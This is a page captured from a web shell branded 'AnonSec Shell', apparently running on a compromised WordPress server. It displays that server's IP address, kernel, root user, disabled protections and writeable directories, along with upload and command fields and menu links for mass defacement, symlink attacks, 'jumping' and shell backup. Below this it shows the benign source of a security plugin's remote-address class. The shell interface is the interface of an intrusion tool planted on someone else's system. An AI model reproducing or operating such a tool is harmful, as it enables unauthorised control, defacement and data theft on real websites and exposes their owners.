AnonSec Shell
Server IP : 104.21.14.48  /  Your IP : 13.58.82.214   [ Reverse IP ]
Web Server : Apache
System : Linux b70eb322-3aee-0c53-7c82-0db91281f2c6.secureserver.net 6.1.90-1.el9.elrepo.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 2 12:09:22 EDT 2024 x86_64
User : root ( 0)
PHP Version : 8.0.30.2
Disable Function : NONE
Domains : 0 Domains
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/wp-content/plugins/defender-security/src/component/http/remote-address/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/wp-content/plugins/defender-security/src/component/http/remote-address/class-remote-address.php
<?php
/**
 * Handles the determination of the remote IP address based on server settings and configurations.
 *
 * @package    WP_Defender\Component\Http\Remote_Address
 */

namespace WP_Defender\Component\Http\Remote_Address;

use WP_Defender\Traits\IP;
use WP_Defender\Component\Trusted_Proxy_Preset\Trusted_Proxy_Preset;

/**
 * Inspired from Laminas.
 *
 * @see https://github.com/laminas/laminas-http/blob/2.16.0/src/PhpEnvironment/RemoteAddress.php
 */
class Remote_Address {

	use IP;

	/**
	 * Whether to use proxy addresses or not.
	 * As default this setting is disabled - IP address is mostly needed to increase
	 * security. HTTP_* are not reliable since can easily be spoofed. It can be enabled
	 * just for more flexibility, but if user uses proxy to connect to trusted services
	 * it's his/her own risk, only reliable field for IP address is $_SERVER['REMOTE_ADDR'].
	 *
	 * @var bool
	 */
	protected $use_proxy = false;

	/**
	 * List of trusted proxy IP addresses.
	 *
	 * @var array
	 */
	protected $trusted_proxies = array();

	/**
	 * HTTP header to introspect for proxies.
	 *
	 * @var string
	 */
	protected $proxy_header = 'HTTP_X_FORWARDED_FOR';

	/**
	 * The trusted proxy preset.
	 *
	 * @var string
	 */
	protected $trusted_proxy_preset = '';

	/**
	 * Changes proxy handling setting.
	 * This must be static method, since validators are recovered automatically
	 * at session read, so this is the only way to switch setting.
	 *
	 * @param  bool $use_proxy  Whether to check also proxied IP addresses.
	 *
	 * @return $this
	 */
	public function set_use_proxy( $use_proxy = true ): self {
		$this->use_proxy = $use_proxy;

		return $this;
	}

	/**
	 * Checks proxy handling setting.
	 *
	 * @return bool Current setting value.
	 */
	public function get_use_proxy(): bool {
		return $this->use_proxy;
	}

	/**
	 * Get the list of trusted proxy addresses.
	 *
	 * @return array
	 * @since 4.6.0
	 */
	public function get_trusted_proxies(): array {
		/**
		 * Filter the list of trusted proxies.
		 *
		 * @param  array  $trusted_proxies  List of trusted proxy IP addresses or CIDR ranges.
		 *
		 * @since 4.6.0
		 */
		return (array) apply_filters( 'wpdef_firewall_trusted_proxies', $this->trusted_proxies );
	}

	/**
	 * Set list of trusted proxy addresses.
	 *
	 * @param  array $trusted_proxies  The array of trusted proxy IP addresses or CIDR ranges.
	 *
	 * @return $this
	 */
	public function set_trusted_proxies( array $trusted_proxies ): self {
		$this->trusted_proxies = $trusted_proxies;

		return $this;
	}

	/**
	 * Set the header to introspect for proxy IPs.
	 *
	 * @param  string $header  The header to set for proxy IPs. Defaults to 'X-Forwarded-For'.
	 *
	 * @return $this
	 */
	public function set_proxy_header( $header = 'X-Forwarded-For' ): self {
		$this->proxy_header = $this->normalize_proxy_header( $header );

		return $this;
	}

	/**
	 * Set the trusted proxy preset.
	 *
	 * @param  string $trusted_proxy_preset  The trusted proxy preset to set.
	 *
	 * @return $this
	 */
	public function set_trusted_proxy_preset( string $trusted_proxy_preset ): self {
		$this->trusted_proxy_preset = $trusted_proxy_preset;

		return $this;
	}

	/**
	 * Returns client IP address.
	 *
	 * @return string IP address.
	 */
	public function get_ip_address(): string {
		$ip = $this->get_ip_address_from_proxy();

		if ( $ip ) {
			return $ip;
		}

		return defender_get_data_from_request( 'REMOTE_ADDR', 's' );
	}

	/**
	 * Attempt to get the IP address for a proxied client.
	 *
	 * @see http://tools.ietf.org/html/draft-ietf-appsawg-http-forwarded-10#section-5.2
	 * @return false|string
	 */
	protected function get_ip_address_from_proxy() {
		if ( ! $this->use_proxy ) {
			return false;
		}

		$header = $this->proxy_header;

		$server = defender_get_data_from_request( null, 's' );
		if ( ! isset( $server[ $header ] ) || empty( $server[ $header ] ) ) {
			return false;
		}

		$trusted_proxies = $this->get_trusted_proxies();

		// Extract IPs.
		$ips = array_reverse( explode( ',', $server[ $header ] ) );
		foreach ( $ips as $ip ) {
			// trim, so we can compare against trusted proxies properly.
			$ip = trim( $ip );

			// @see http://en.wikipedia.org/wiki/X-Forwarded-For .
			// Since we've removed any known, trusted proxy servers, the right-most
			// address represents the first IP we do not know about -- i.e., we do
			// not know if it is a proxy server, or a client. As such, we treat it
			// as the originating IP.
			foreach ( $trusted_proxies as $trusted_proxy ) {
				if (
					( false !== strpos( $trusted_proxy, '/' ) && $this->compare_cidr( $ip, $trusted_proxy ) ) ||
					$trusted_proxy === $ip
				) {
					continue 2;
				}
			}

			if ( $this->is_ip_in_trusted_proxy_preset( $ip ) ) {
				continue;
			}

			return $ip;
		}

		return false;
	}

	/**
	 * Normalize a header string.
	 * Normalizes a header string to a format that is compatible with
	 * $_SERVER.
	 *
	 * @param  string $header  The header string to normalize.
	 *
	 * @return string
	 */
	protected function normalize_proxy_header( $header ): string {
		$header = strtoupper( $header );
		$header = str_replace( '-', '_', $header );

		if ( 0 !== strpos( $header, 'HTTP_' ) ) {
			$header = 'HTTP_' . $header;
		}

		return $header;
	}

	/**
	 * Check if IP is in trusted proxy preset.
	 *
	 * @param  string $ip  The IP address to check.
	 *
	 * @return bool
	 */
	public function is_ip_in_trusted_proxy_preset( string $ip ): bool {
		$trusted_ips = array();
		if ( ! empty( $this->trusted_proxy_preset ) ) {
			/**
			 * Retrieve Trusted_Proxy_Preset instance.
			 *
			 * @var Trusted_Proxy_Preset $trusted_proxy_preset ;
			 */
			$trusted_proxy_preset = wd_di()->get( Trusted_Proxy_Preset::class );
			$trusted_proxy_preset->set_proxy_preset( $this->trusted_proxy_preset );
			$trusted_ips = $trusted_proxy_preset->get_ips();
		}

		if ( empty( $trusted_ips ) ) {
			return false;
		}

		foreach ( $trusted_ips as $trusted_ip ) {
			if (
				( false !== strpos( $trusted_ip, '/' ) && $this->compare_cidr( $ip, $trusted_ip ) ) ||
				$trusted_ip === $ip
			) {
				return true;
			}
		}

		return false;
	}
}

Anon7 - 2022
AnonSec Team